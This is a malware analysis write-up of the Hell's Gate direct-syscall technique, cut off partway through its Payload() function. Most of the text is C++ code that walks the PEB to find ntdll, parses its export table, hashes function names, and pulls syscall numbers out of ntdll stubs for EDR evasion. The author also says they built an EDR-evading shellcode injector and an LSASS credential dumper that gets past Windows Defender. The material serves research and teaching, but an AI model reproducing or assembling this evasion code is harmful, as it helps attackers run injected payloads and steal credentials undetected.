The following writeup is my analysis of the Hell’s Gate malware. This malware strain contains a technique that issues syscalls directly on the Windows operating system in order to evade EDR detection.
Upon completion of my analysis, I developed my own implementation in C++ that reuses existing syscall instructions within ntdll.dll and a custom hashing technique to evade the modern methods of detection for these types of techniques.
Further optimizations can be added to the technique; however, for the sake of time, two PoCs were developed in 2024:
- A basic shellcode injector that evades modern EDR
- An LSASS dumper that evades Windows Defender
The LSASS dumper may be optimized to evade EDR; however, I leave this as an exercise to the reader.
Disclaimer #
Copyright 2024 Milton Valencia
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Understanding The Malware #
So I downloaded the source code for this technique from am0nsec. I wanted to break down this code line-by-line starting with the main function.
INT wmain() {
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
return 0x1;
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
return 0x1;
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
return 0x1;
Payload(&Table);
return 0x00;
}
So it looks like the first step is to “Get NTDLL”.
Get NTDLL Module Entry #
To get a better understanding of how this was achieved I used the following PoC:
int main()
{
PTEB pTeb = GetThreadEnvironmentBlock();
PPEB pPeb = pTeb->ProcessEnvironmentBlock;
std::cout << "[*] Testing on OS Version: " << pPeb->OSMajorVersion << std::endl;
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pPeb->LoaderData->InMemoryOrderModuleList.Flink - 0x10);
std::cout << "[*] pLdrDataEntry: 0x" << std::hex << (uint64_t)pLdrDataEntry << std::endl;
getchar();
return 0;
}
For the sake of brevity, structures will only be brought up when relevant. Once run, we see the following output, but what does this address represent?
C:\Users\developer\Desktop>hg.exe
[*] Testing on OS Version: 10
[*] pLdrDataEntry: 0x26f94d06020
If we break into WinDbg, we can get to the PEB using !process 0 0 hg.exe. The main thing we want to look at here is the InMemoryOrderModuleList.
We can see that this is very similar to our output and if we subtract 0x10 from this address it’s exactly the same.
At first glance, this does not tell us much. However, each list entry is actually wrapped in an LDR_DATA_TABLE_ENTRY. So, we can get more context by dumping the structure itself located at the Flink pointer.
In the output above we can see that this is in fact the entry to the NTDLL module. The steps are basically as follows in this line of code:
- Use the GS register to get a pointer to the TEB
- The TEB contains a pointer to the PEB
- Use the PEB to get a pointer to the PEB_LDR_DATA structure
- Using the PEB_LDR_DATA structure we can get to the InMemoryOrderModuleList
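The 0x10 adjustment seen earlier follows from where the list link sits inside its containing structure. Below is a minimal, portable sketch of that arithmetic. ListEntry, MockLdrEntry, and EntryFromMemoryOrderLink are hypothetical stand-ins invented for illustration and are not the real Windows definitions; only the idea of stepping back from an embedded link to the start of its structure is taken from the text.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical stand-ins for the Windows types; only the layout idea matters.
struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

struct MockLdrEntry {
    ListEntry InLoadOrderLinks;    // first member, offset 0
    ListEntry InMemoryOrderLinks;  // second member, offset 2 * sizeof(void*)
    void*     DllBase;
};

// Same arithmetic as the CONTAINING_RECORD macro: step back from the
// embedded link to the start of the structure that contains it.
inline MockLdrEntry* EntryFromMemoryOrderLink(ListEntry* link) {
    assert(link != nullptr);
    return reinterpret_cast<MockLdrEntry*>(
        reinterpret_cast<std::uint8_t*>(link) -
        offsetof(MockLdrEntry, InMemoryOrderLinks));
}
```

On a 64-bit build the offset of the second link is 16 bytes, which is the 0x10 the original code subtracts. Using offsetof (or CONTAINING_RECORD on Windows) avoids hardcoding that number.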
Let’s implement a PoC that traverses this doubly-linked list using our newfound knowledge, since we have no guarantee that ntdll.dll will always be the entry the original code assumes (Flink->Flink - 0x10).
int main()
{
PTEB pTeb = NULL;
PPEB pPeb = NULL;
PLIST_ENTRY pEntry = NULL;
PLIST_ENTRY pHeadEntry = NULL;
PPEB_LDR_DATA pLdrData = NULL;
PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
PLDR_DATA_TABLE_ENTRY pLdrDataTableEntry = NULL;
/* Get the TEB */
pTeb = GetThreadEnvironmentBlock();
/* Get the PEB */
pPeb = pTeb->ProcessEnvironmentBlock;
/* OS Version Detection Omitted */
std::cout << "[*] Testing on OS Version: " << pPeb->OSMajorVersion << std::endl;
/* Obtain a pointer to the structure that contains information about the loaded modules for a given process */
pLdrData = pPeb->LoaderData;
/* Get the pointer to the InMemoryOrderModuleList which is a doubly-linked list that contains
the loaded modules for the process */
pHeadEntry = &pLdrData->InMemoryOrderModuleList;
/* Iterate over the InMemoryOrderModuleList */
std::wcout << L"\nInMemoryOrderModuleList\n" << std::endl;
std::wcout << L"\tBase\t\t\tModule\n" << std::endl;
for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink)
{
pLdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pEntry;
std::wcout << L"\t"
<< std::hex << pLdrDataTableEntry->DllBase << L"\t"
<< pLdrDataTableEntry->FullDllName.Buffer
<< std::endl;
}
getchar();
return 0;
}
Nice, we can see that our PoC works:
However, we still need to get it to return the original value from the PoC, which is a pointer to the module’s table entry. So, let’s modify our code once more, creating a single function to obtain the entry dynamically.
When writing this I observed that the last PoC (we wrote) did not parse each entry properly. To reach an LDR_DATA_TABLE_ENTRY, we must subtract 0x10 from the list pointer, since the InMemoryOrderLinks member that Flink points at IS NOT the first member of the structure (on x64 it sits at offset 0x10, after InLoadOrderLinks).
PLDR_DATA_TABLE_ENTRY GetNtdllTableEntry()
{
PTEB pTeb = NULL;
PPEB pPeb = NULL;
DWORD dwModuleHash = 0x00;
DWORD dwDllNameSize = 0x00;
DWORD dwRorOperations = 0x00;
PLIST_ENTRY pEntry = NULL;
PLIST_ENTRY pHeadEntry = NULL;
PPEB_LDR_DATA pLdrData = NULL;
PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
PLDR_DATA_TABLE_ENTRY pLdrDataTableEntry = NULL;
/* Get the TEB */
pTeb = GetThreadEnvironmentBlock();
/* Get the PEB */
pPeb = pTeb->ProcessEnvironmentBlock;
/* Obtain a pointer to the structure that contains information about the loaded modules for a given process */
pLdrData = pPeb->LoaderData;
/* Get the pointer to the InMemoryOrderModuleList which is a doubly-linked list that contains
the loaded modules for the process */
pHeadEntry = &pLdrData->InMemoryOrderModuleList;
/* Iterate over the InMemoryOrderModuleList and identify NTDLL */
for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink)
{
/* We must subtract 16 from each entry in the InMemoryOrderModuleList. This is necessary because
the Flink points at the InMemoryOrderLinks member, which is not the first member of the
LDR_DATA_TABLE_ENTRY structure, so subtracting 0x10 gives us the start of the structure */
pLdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)((std::int64_t)pEntry-0x10);
/* Calculate a hash for the given DLL name */
dwDllNameSize = (pLdrDataTableEntry->BaseDllName.Length) / sizeof(wchar_t);
dwRorOperations = 0x00;
dwModuleHash = 0x00;
/* Hash the DLL name for identification */
for (int i = 0; i < dwDllNameSize; i++)
{
dwModuleHash = dwModuleHash + ((uint32_t)pLdrDataTableEntry->BaseDllName.Buffer[i]);
if (dwRorOperations < (dwDllNameSize - 1)) {
dwModuleHash = _rotr(dwModuleHash, 0xd);
}
dwRorOperations++;
}
std::wprintf(L"[*] Found %ws (HASH: 0x%lx, ENTRY: 0x%p)\n", pLdrDataTableEntry->BaseDllName.Buffer,
dwModuleHash,
(PVOID)pLdrDataTableEntry);
if (dwModuleHash == NTDLL_HASH)
{
std::wprintf(L"[+] Located ntdll: 0x%p\n", (PVOID)pLdrDataTableEntry);
return pLdrDataTableEntry;
}
}
/* ntdll.dll was not found, so do not return the last entry visited */
return NULL;
}
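The hashing loop inside GetNtdllTableEntry() can be studied in isolation. The following is a portable sketch of the same add-then-rotate scheme, assuming the name is available as a UTF-16 string. RotateRight32 and HashModuleName are hypothetical names chosen for illustration; the rotation replaces the MSVC _rotr intrinsic so the snippet builds on any compiler.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Rotate a 32-bit value right by `bits` (portable replacement for _rotr).
inline std::uint32_t RotateRight32(std::uint32_t value, unsigned bits) {
    bits &= 31u;
    return bits == 0 ? value : (value >> bits) | (value << (32u - bits));
}

// Add each UTF-16 code unit to the running hash, rotating right by 13 after
// every character except the last one, mirroring the loop shown above.
inline std::uint32_t HashModuleName(const std::u16string& name) {
    std::uint32_t hash = 0;
    for (std::size_t i = 0; i < name.size(); ++i) {
        hash += static_cast<std::uint32_t>(name[i]);
        if (i + 1 < name.size()) {
            hash = RotateRight32(hash, 13);
        }
    }
    return hash;
}
```

Note that the hash is case-sensitive, so the constant compared against (NTDLL_HASH in the function above) has to be computed from the name exactly as the loader stores it in BaseDllName.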
Getting the Export Address Table (EAT) of NTDLL #
The next step we see is getting the Export Address Table of NTDLL.
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
Looking at the source, this function was written by the author of Hell’s Gate, so let’s look at it.
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
// Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
// Get NT headers
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
Let’s take a closer look at this in WinDbg.
Once we have the DataDirectory, we can obtain the VirtualAddress of the Export Address Table from index 0 of the DataDirectory (the export directory entry). We can confirm this with !dh ntdll.dll -f.
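The same header walk can be sketched portably over a raw byte buffer, which makes the offsets involved explicit. This is a minimal sketch under stated assumptions: the image is PE32+ (64-bit), the host is little-endian, and ReadAt and ExportDirectoryRva are hypothetical helper names rather than Windows APIs. The offsets follow the documented PE layout: e_lfanew at 0x3C, then a 4-byte signature, a 20-byte file header, and the data directory array at offset 112 of the PE32+ optional header.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// Read a value of type T at `offset`, or nothing if it would run past the buffer.
// Assumes a little-endian host, matching the on-disk byte order of PE files.
template <typename T>
std::optional<T> ReadAt(const std::vector<std::uint8_t>& image, std::size_t offset) {
    if (offset > image.size() || image.size() - offset < sizeof(T)) return std::nullopt;
    T value{};
    std::memcpy(&value, image.data() + offset, sizeof(T));
    return value;
}

// Return the export directory RVA of a PE32+ image, or nothing if validation fails.
inline std::optional<std::uint32_t> ExportDirectoryRva(const std::vector<std::uint8_t>& image) {
    const auto dosMagic = ReadAt<std::uint16_t>(image, 0);
    if (!dosMagic || *dosMagic != 0x5A4D) return std::nullopt;        // "MZ"
    const auto lfanew = ReadAt<std::uint32_t>(image, 0x3C);           // e_lfanew
    if (!lfanew) return std::nullopt;
    const std::size_t nt = *lfanew;
    const auto signature = ReadAt<std::uint32_t>(image, nt);
    if (!signature || *signature != 0x00004550) return std::nullopt;  // "PE\0\0"
    const auto optMagic = ReadAt<std::uint16_t>(image, nt + 4 + 20);
    if (!optMagic || *optMagic != 0x020B) return std::nullopt;        // PE32+ only
    // DataDirectory[0].VirtualAddress: 112 bytes into the PE32+ optional header.
    return ReadAt<std::uint32_t>(image, nt + 4 + 20 + 112);
}
```

Unlike the in-memory version, every read here is bounds-checked, which is worth doing whenever the headers come from an untrusted file rather than from a module the loader has already mapped.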
Let’s go ahead and quickly re-implement this.
VOID GetExportAddressTable(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
{
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
PIMAGE_NT_HEADERS pImageNtHeaders = NULL;
/* Verify that the DOS header is valid */
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
std::wcout << L"[-] Failed to detect DOS header\n";
return;
}
/* Get a pointer to the IMAGE_NT_HEADER structure of the module (ntdll.dll) */
pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
std::wcout << L"[-] Failed to obtain pointer to IMAGE_NT_HEADERS\n";
return;
}
/* Obtain the address of the EAT */
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return;
}
Understanding GetVxTableEntry() #
The next step we see is a declaration of a VX_TABLE structure along with a call to the function GetVxTableEntry().
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Let’s start breaking down the GetVxTableEntry() function. These first three lines turn the three RVAs stored in the export directory into usable pointers:
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
These fields belong to the IMAGE_EXPORT_DIRECTORY structure. I was able to find the structure definition on ReactOS as well as malwareid.in (it is also declared in winnt.h). Using this we can manually verify the layout using WinDbg.
typedef struct _IMAGE_EXPORT_DIRECTORY
{
DWORD Characteristics;
DWORD TimeDateStamp;
WORD MajorVersion;
WORD MinorVersion;
DWORD Name;
DWORD Base;
DWORD NumberOfFunctions;
DWORD NumberOfNames;
DWORD AddressOfFunctions; /* RVA from the image base */
DWORD AddressOfNames; /* RVA from the image base */
DWORD AddressOfNameOrdinals; /* RVA from the image base */
}
IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
Using this structure, we can start to map how it is used by the malware.
In the next lines of code we see a pretty gnarly for-loop.
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
};
}
}
Let’s break down the first few lines.
- First, we iterate over the number of names in the IMAGE_EXPORT_DIRECTORY:
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
- Then we resolve each function name, just as we saw in WinDbg:
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
- Next, we get the function address as previously seen, using the name’s ordinal as the index into AddressOfFunctions:
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
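The name, ordinal, and function arrays are easy to mix up, so here is a small portable model of the lookup described in the list above. MockExports and FindExportRva are hypothetical names invented for this sketch, and the arrays hold already-resolved values instead of RVAs into a mapped image.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <string>
#include <vector>

// Hypothetical in-memory model of the three export arrays.
struct MockExports {
    std::vector<std::string>   names;         // AddressOfNames, resolved to strings
    std::vector<std::uint16_t> nameOrdinals;  // AddressOfNameOrdinals, parallel to names
    std::vector<std::uint32_t> functionRvas;  // AddressOfFunctions, indexed by ordinal
};

// names[i] pairs with nameOrdinals[i], and that ordinal (not i itself)
// selects the entry in functionRvas.
inline std::optional<std::uint32_t> FindExportRva(const MockExports& exports,
                                                  const std::string& wanted) {
    for (std::size_t i = 0; i < exports.names.size() && i < exports.nameOrdinals.size(); ++i) {
        if (exports.names[i] != wanted) continue;
        const std::uint16_t ordinal = exports.nameOrdinals[i];
        if (ordinal >= exports.functionRvas.size()) return std::nullopt;
        return exports.functionRvas[ordinal];
    }
    return std::nullopt;
}
```

The key point is that the name index and the function index are different numbers, which is why the original code indexes pdwAddressOfFunctions with pwAddressOfNameOrdinales[cx] rather than with cx.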
If we re-implement this in our PoC we see the following:
The next line is an if condition. Interestingly, we see the introduction of a new function, djb2().
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
In addition, we once more see our previously set dwHash. Now from my perspective this does not appear to be necessary. We could use any other hashing function… but for now I’ll leave this function as designed.
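For reference, the classic djb2 string hash is only a few lines. The sketch below is the textbook variant (start at 5381, multiply by 33, add the next byte) widened to 64 bits. The seed parameter is an assumption added for illustration, since the body of the djb2() used by the sample is not shown in this writeup and its starting value may differ.

```cpp
#include <cassert>
#include <cstdint>
#include <string_view>

// Textbook djb2: hash = hash * 33 + c, written as (hash << 5) + hash.
// The `seed` parameter is illustrative; 5381 is the classic default.
constexpr std::uint64_t Djb2(std::string_view text, std::uint64_t seed = 5381) {
    std::uint64_t hash = seed;
    for (unsigned char c : text) {
        hash = ((hash << 5) + hash) + c;
    }
    return hash;
}
```

Because only the resulting constant is compared, any hash with few collisions across the ntdll.dll export names would serve the same purpose, which matches the observation that the choice of function is not essential.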
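The next block of code is rather “large”: we see a few checks, then we ultimately look for the bytes 0x4c, 0x8b, 0xd1, 0xb8, 0x00, and 0x00. Note that the check skips offsets 4 and 5, which hold the syscall number, and that 0xb8 encodes mov eax, imm32 (the source comment says RCX).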
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
If we look at this in sickle, the first three bytes are indeed mov r10, rcx. However, based on the output we may be able to just use 0x4c, 0x8b, and 0xd1.
┌──(wetw0rk㉿kali)-[/opt/Sickle/src]
└─$ python3 sickle.py -m asm_shell -f c
[*] ASM Shell loaded for x64 architecture
sickle > d 4c8bd1b80000
4c8bd1 -> mov r10, rcx
Let’s update our PoC once more.
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
WORD cx = 0x00;
WORD cw = 0x00;
PCHAR pczFunctionName = NULL;
PVOID pFunctionAddress = NULL;
for (cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++)
{
pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
/* We found the target function */
if (djb2((PBYTE)pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
printf("[*] Found target function: %s (0x%p)\n", pczFunctionName, pFunctionAddress);
while (TRUE) {
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
printf("[+] Syscall found @{0x%p}\n", (PVOID)((intptr_t)pFunctionAddress + cw));
getchar();
/* Stop scanning once the stub has been located */
break;
}
cw++;
}
}
}
return TRUE;
}
We can see that the PoC successfully located the instructions.
Finally, we see that if we locate this sequence of bytes / instructions, we write the syscall number to the VX_TABLE structure.
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
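At first I was not sure why the value is assembled like this (we may be able to re-implement it). The reason is that the 32-bit immediate of mov eax is stored little-endian, so the byte at offset 4 is the low byte and the byte at offset 5 is the high byte. In WinDbg we can see that reading this value is pretty straightforward.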
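To make the byte layout concrete, the pattern match and the high/low combination can be sketched over a plain byte buffer. This is a portable illustration, not the author's implementation: ExtractSyscallNumber and the maxScan bound are hypothetical additions, and the buffer stands in for the bytes at the start of a function stub.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Scan up to `maxScan` offsets for `mov r10, rcx; mov eax, imm32` and return
// the low 16 bits of the immediate. Every read stays inside the buffer.
inline std::optional<std::uint16_t> ExtractSyscallNumber(
        const std::vector<std::uint8_t>& code, std::size_t maxScan = 32) {
    for (std::size_t off = 0; off < maxScan && off + 8 <= code.size(); ++off) {
        const std::uint8_t* p = code.data() + off;
        if (p[0] == 0x0F && p[1] == 0x05) return std::nullopt;  // reached syscall: too far
        if (p[0] == 0xC3) return std::nullopt;                  // reached ret: too far
        if (p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1 &&     // mov r10, rcx
            p[3] == 0xB8 && p[6] == 0x00 && p[7] == 0x00) {     // mov eax, imm32 (upper bytes zero)
            // The immediate is little-endian: p[4] is the low byte, p[5] the high byte.
            return static_cast<std::uint16_t>((p[5] << 8) | p[4]);
        }
    }
    return std::nullopt;
}
```

The explicit bound is a design choice of this sketch: the quoted loop uses while (TRUE) and relies on hitting a syscall or ret byte to stop, whereas here the scan also ends when the buffer or the scan limit is exhausted.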
We have now implemented our own version of this function to have an understanding of its underlying operations.
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
BYTE high = 0x00;
BYTE low = 0x00;
WORD cx = 0x00;
WORD cw = 0x00;
PCHAR pczFunctionName = NULL;
PVOID pFunctionAddress = NULL;
for (cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++)
{
pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
/* We found the target function */
if (djb2((PBYTE)pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
/* Quick and dirty fix in case the function has been hooked */
while (TRUE) {
/* Check if a syscall instruction has been reached, if so we are too deep into the function */
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
/* Check if a ret instruction has been reached, if so we read too deep into the function */
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
high = *((PBYTE)pFunctionAddress + 5 + cw);
low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
printf("[*] %s syscall start found @{0x%p}\n", pczFunctionName, (PVOID)((intptr_t)pFunctionAddress + cw));
printf("\t[*] High: 0x%x\n", high);
printf("\t[*] Low: 0x%x\n", low);
printf("\t[*] Syscall: 0x%x\n", pVxTableEntry->wSystemCall);
break;
}
cw++;
}
}
}
return TRUE;
}
With that we can introduce the rest of the main function.
vxTable.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtAllocateVirtualMemory))
return 0x01;
vxTable.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtCreateThreadEx))
return 0x1;
vxTable.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtProtectVirtualMemory))
return 0x1;
vxTable.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtWaitForSingleObject))
return 0x1;
Understanding Payload() #
Finally, we’re at the final function call in the main() function.
Payload(&Table);
We can see that this is yet another custom function implemented by the author. However, we see three additional custom functions: HellsGate, HellDescent, and VxMoveMemory.
BOOL Payload(PVX_TABLE pVxTable) {
NTSTATUS status = 0x00000000;
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
// Allocate memory for the shellcode
PVOID lpAddress = NULL;
